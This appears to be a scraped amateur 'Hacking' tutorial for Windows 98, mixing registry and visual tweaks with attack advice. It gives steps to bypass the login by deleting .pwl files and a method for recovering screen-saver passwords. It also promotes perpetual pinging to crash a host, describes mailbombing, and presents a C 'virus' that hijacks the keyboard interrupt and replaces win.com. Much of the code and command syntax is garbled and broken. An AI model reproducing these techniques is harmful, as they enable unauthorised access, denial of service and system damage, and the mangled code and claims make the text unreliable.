Вы находитесь на странице: 1из 15

Hacking

4. Windows torn apart:


Hacking Windows Login Passwords:
To hack the windows login password, reboot and wait for
the message:
Starting Windows 98
When you see this on the screen, press F8. The boot
menu will come up. Select option 7, to boot into Dos. Then go
to the windows directory by typing
C :\> cd windows
Then rename all files with the extension .pwl by typing
the following command:
C: \windows>ren *.pwl *.xyz
Or, delete them by typing
C:\windows>del *.pwl
Now when the windows password login pops up, you can
write any thing in the place where the password has got to be
typed. Windows just takes it as the original password.
Suppose if the F8 key is disabled then boot from the
floppy and delete *.pwl from windows directory.

HACKING

There is a way of disabling the F8 key. Simply follow the


following steps.
1.

Find the file msdos.sys which can be found at c:\. Since


this is a hidden system file, you will have to make it
writeable by changing its attributes and by typing
C:\>attrib msdos.sys h w
2. Open msdos.sys in WordPad
3. you will see something that looks like this:
; FORMAT
[Paths]
WinDir=C: \WINDOWS
WinBootDir=C: \WINDOWS
HostWinBootDrv=C
[Options]
BootMenu=0(default)
BootMulti=1
BootGui=1
DoubleBuffer=1
AutoScan=1
WinVer=4.10.1998
;
To disable the function keys during boot up, directly below
[Options] you insert the following keys of code:
BootDelay=0
4. Since msdos.sys is an important system file you should
change its attributes back to read only and hidden by
typing
attrib msdos.sys +h +r

Changing Windows Visuals:

HACKING

Changing windows logo:


If your computer is configured to work normally, then a
boring blue screen saying Welcome to Windows 98 will
welcome every time you boot your system. The following
procedure will change it to the way the user wants Look for file
named logo.sys. As it is a system file it is kept hidden. Change
its attributes by doing the following
Go to MSDOS
Type the following:
C:\windows\attrib logos.sys s h r
Now, do the following steps to get welcome screen you want
Step1.
Step2.
Step3.
Step4.

Open MSPaint
From the File Menu select Open
Open c:\Windows\logos.sys
This opens the boring screen. You can change and
save it as logos.sys as shown in fig(a)
Step5. Type at command prompt attrib logos.sys +h +r +s

HACKING

Changing Shut Down Screen:


Go to command prompt and make logow.sys writable
Open in paint change what you want and save it as logow.sys
This changes the boring shut down screen

HACKING

Hacking windows screen saver password:


This is an interesting hack and not many people know
about it. This requires no canned hacking tool, we will crack
the password manually.
If a screen saver is password protected, then it does not
allow us to do anything on a system until and unless we enter
the password. Here, not even CTRL+ALT+DEL works.
To begin with, Windows stores the encrypted password in a
file called user.dat file in the Windows directory. Test the
coding scheme in your own system by giving the letters whose
codes you are to know. Now you are armed with the letters and
their corresponding codes and you are at a step to break any
password.
HACKING

For example, let the password be DOPE. Then the


encryption scheme is:
D = 0C
O = A1
P = 26
E = 58
To break this password, open the user.dat file and extract
the corresponding codes by comparing with the codes we have.

Customize your
Explorer.exe:

Operating

System

by

Editing

Do not try to edit explorer.exe in Dos while running


windows. It is a read only file and windows will not allow you
to edit.
Restart the computer in MSDOS
Once you get your Dos Prompt go to windows directory by
typing
C:\>cd windows
Once you are in windows directory, open the file explorer.exe in
MSDOS editor .i.e. type
C:\windows>edit/70 explorer.exe
The screen would look like full of weird characters of
something in machine language. Actually, each symbol has a
numeric value that we can see at the right bottom of the
screen at VALUE:

HACKING

Line: 2334 to line: 2348 deal with what appears when you
click the Start Button, You can change the name of Shut Down
to any name, even the Programs to Hackings.
Then at line 2390 comes a very interesting part. This line
lets us change the text on START button to any thing we want,
you can have your name on the START button even your name
is 132 letters long!!!
If you see carefully on LINE: 2390 you will find that a
clubs symbol precedes S t a r t. If you move the cursor over
the cursor over the club you will find that its value is 5. So,
the text after the clubs symbol, in this case S t a r t has to be
of 5 letters. Now, if you want to replace Start and in its place
put something like stop which is 4 letters; then you will search
for a symbol whose numeric value is 4 and paste it over clubs
symbol.

5. Registry Hacking:
Structure of Registry:
The registry is a hierarchical database that contains
virtually all information about yours computers configuration.
The registry editor is a utility by the filename regedit.exe
that allows you to see, search, modify and save the registry
database of windows.
The registry editor is divided into two sections. In the left
one there is a hierarchical structure of the database in the
right one, there are the values.

HACKING

The principal keys of the registry are:


HKEY_LOCAL_MACHINE:
This key contains any hardware, applications and
services information. Several hardware information is updated
automatically while the computer is booting. The data stored
in this key is shared with any user.
HKEY_CLASSES_ROOT:
This
key
is
an
alias
of
the
branch
HKEY_LOCAL_MACHINE\Software\Classes and contains OLE,
drag n drop, shortcut and file association information.
HKEY_CURRENT_CONFIG
This
key
is
also
an
alias
of
HKEY_LOCAL_MACHINE\Config, with the current computer
configuration.
HKEY_DYN_DATA
Some information in registry changes frequently, so
windows maintains part of the registry in memory instead of
on the hard disk. For example, it stores Computer
performance
HKEY_USERS
This contains the information about different users
existing on the system.

HACKING

HKEY_CURRENT_USER
This keep track of current user existing in the system.

Disabling display of drives in My Computer:


To disable the display of local drives when you click My
Computer go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Now, in the right pane create a new DWORD item and
name it NoDrives. Modify its value and set it to 3FFFFFF. Press
F5 to refresh. When you click on My Computer, no drives will
be shown. To enable the display of drives in My Computer,
simply delete this DWORD item.

CLSID Folders:
The folders like Control Panel, Dial up Networking etc are
system folders. Each system folder has a unique CLSID key or
Class Id which is a value.
The following are the CLSID values of the most commonly
used icons:
My Briefcase :{ 85BBD920-42AO-1069-A234-08002B30309D}
My Computer :{ 20D04FE0-3AEA-1069-A2D8-08002B303098}
Recycle Bin :{ 645FF040-5081-101B-9F08-00AA002F954E}
To change the name of the Recycle Bin folder go to

HACKING

HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F0800AA002F954E}.
In the right pane change the default to what ever name
you want
To delete the Recycle Bin, go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curre
ntVersion\explorer\Desktop\namespace
And
delete
the
00AA002F954E}

key

{645FF040-5081-101B-9F08-

To remove the Find option from the go to


HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Right click on the right pane and select New, DWORD
value. Name it NoFind. Double click the newly created DWORD
to edit its value and enter 1 as its value. This will disable the
FIND option of the Start Menu.
To restore the FIND command, simply delete the DWORD
value.

6. Peeping the Internet:


Ping:
Ping is a part of ICMP protocol, i.e. the Internet Control
message Protocol, that is used to trouble shoot the TCP\IP
networks.

HACKING

10

Ping is a command which sends out a datagram to the


specified host. This specified host if alive, i.e. turned on, sends
out reply or echoes off the same datagram. If the datagram
that returns to your computer has the same datagram that
was sent, then it means that the host is alive. So ping is a
command that allows you to check if a host is alive or not. It
can also be used to calculate the amount of time taken for a
datagram to reach the Host.
It is so deadly that it can be used to ping a hostname
perpetually that may even cause the Host to crash. Now, what
happens is that when a host receives a ping signal, it allocates
some of its resources to attend to or echo back the datagram.
Now if you ping a host perpetually, then time will occur when
all resources of the host are used and the host either hangs or
restarts.
You can even ping yourself. The IP 127.0.0.1 is the local
host. This means that when you connect to 127.0.0.1, you
actually connect to your own machine. So to ping yourself
perpetually, issue the following command:
Ping t 127.0.0.1

Tracert:
When you type hotmail.com in your browser then your
request passes through a large number of computers before
reaching hotmail.com. Or when you login to your shell account
and type the password then this password passes through
large number of computers before reaching the shell account

HACKING

11

server. To find the list of servers the password or request


passes through, one can use the TRACERT command.

Mailbombing:
Mail bombing means to send a huge number of e-mails to
a single e-mail account so that the maximum space of the
account is filled up and the owner of the account cannot
receive any important e-mails and it becomes difficult for the
user to read existing e-mails.
All e-mail accounts have a maximum space limit. For
example, Yahoo has a space limit of 4MB. Now if this
maximum space is filled up then no new messages can come
and the mail server sends back any new messages that come
so, if the victim who has been mailbombed is expecting any
new important messages, that he can pretty much kiss them
good bye.

7. Towards Cracking:
Virus:
Here we have a sample C code to illustrate a sample virus
that cracks Win.com.
The notion is to conquer the IVT, alter the entry
corresponding to interrupt number 0X09 to our user defined
program fragment. When any key is pressed, the control
transfers to our code, where we unload the command.com
using system (exit) function to shut down the computer.

HACKING

12

#include<stdio.h>
#include<process.h>
#define INTR 0x09
void interrupt (* oldhandler)();
void interrupt handler()
{
system(exit);
FILE *fp=fopen(c:\\windows\\win.com);
Fseek(fp,0,SEEK_END);
long l=ftell(fp);
if(l==123)
{
fclose(fp);
return;
}
System(cd c:\\windows);
System(ren win.com oldwin.com);
System(ren mywin.com win.com);
fclose(fp);
}

int main(void)
{
/* save old interrupt vector*/
oldhandler =getvect(INTR);
/*Install the new interrupt handler*/
setvect(INTR,handler);
HACKING

13

keep(500);
return 0;
}
/*MyWin.cpp*/
#include<process.h>
main()
{
int result;
result=spawnl(P_WAIT,tsr.exe,null);
if(result==-1)
{
perror(error from spawnl);
}
return 0;
}

8. Pros & Cons:


Pros:
1.
2.
3.
4.

Fortifies security in a devious fashion


checks for loop holes in our application
calls for high thinking and analyzing capability
explore the uncovered

Cons:
1. Risk of getting misunderstood
2. Risk in loss of sensitive data

9. Conclusion:
At the deducting part, I am to utter that hacking is a
paranormal activity.
HACKING

14

All hackers know that an important hacker ethic is never


to delete files, or cause any damage. Make good use of your
additional bit adorning your thought.

HACKING

15